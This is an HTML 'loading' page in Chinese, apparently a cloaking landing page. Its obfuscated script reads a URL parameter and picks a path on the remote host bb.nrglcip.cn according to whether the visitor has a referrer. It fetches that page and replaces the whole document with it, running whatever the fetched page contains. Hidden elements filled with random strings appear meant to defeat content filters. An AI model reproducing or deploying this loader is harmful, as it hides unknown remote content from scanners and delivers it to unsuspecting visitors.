<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SWA6Rrloc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SWA6Rrloc .eisDoP7aBN6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SWA6Rrloc .content {
            line-height: 50px;
            text-align: center
        }

        .SWA6Rrloc .img {
            width: 100%
        }

        .SWA6Rrloc .yRUWoF0LSKc {
            text-align: center
        }

        .SWA6Rrloc .yRUWoF0LSKc span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SWA6Rrloc .yRUWoF0LSKc span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SWA6Rrloc .yRUWoF0LSKc span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SWA6Rrloc .yRUWoF0LSKc span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SWA6Rrloc .yRUWoF0LSKc span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SWA6Rrloc .yRUWoF0LSKc span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SWA6Rrloc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function IapYQWp9H(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var HyVkc = IapYQWp9H('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ HyVkc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ HyVkc +".html?a=share";
		}
		
        FREtoFx5i=url+"#"+new Date().getTime();
        FREtoFx5i && function() {
            $.get(FREtoFx5i, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>QYXWlcDEdaYGuwbejWEUt1zmCUj5ops801sp5lMFdgCAg</span>
<ul style='display:none' >QTGWAgfcA79rxDsTorAGkNwd21ca0qgGYJXfDIOHjW6LXIk5C52XdDDciElZa82fqgL</ul>
<span style='display:none'>QYXWlcDEdaYGuwbejWEUt1zmCUj5ops801sp5lMFdgCAg</span>
<b style='display:none' >A2P2Q4s5Vkaxckhk8ymiAHyQNolMEejurKvYhHMb3xiaRQ55WiFTxTsdwoc</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>AYFRyjejcmjgFYY5MoLWNYZ0JrQ1a2CjmpZ3gS7RRFTBGMn4RIzXg7F1VIZo2cefOeRi3h5othAwDMR4RJG8ZytzpTUAi</a>
<a  href='#' style='display:none'>AYFRyjejcmjgFYY5MoLWNYZ0JrQ1a2CjmpZ3gS7RRFTBGMn4RIzXg7F1VIZo2cefOeRi3h5othAwDMR4RJG8ZytzpTUAi</a><div class="SWA6Rrloc">
    <div class="eisDoP7aBN6">
        <div class="yRUWoF0LSKc">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>JVZ18bRbFvQxjlkMTpnMyoDqG6veSClWsPztBUtL9aAMuWNLYEsE8ea6l60JWnRtxPG0h3nC257OhSbJKRBH1w7TEinFg0</span>
<b style='display:none' >gH88BCM1WNwN6RaNtaUeRHg02Phe3WcRth3HOOjwaGN6hVnjN3P9nZmNsDgq9GgA5Pcnqw07k4k9ctxA1x4PB3ti</b>
<h1 style='display:none' >CTFf9bjH9hQUerDpkO5C3Z5FIYiC9u72YzNypUDYy1</h1>
<img  src='' style='display:none'>
<ul style='display:none' >Bk7ejv7sVoOEwRUZzQvMzKoqGrnFw8Y4uX0U5J4ioIQRjq4js8GJvky0f87wSWN36</ul></body>
</html>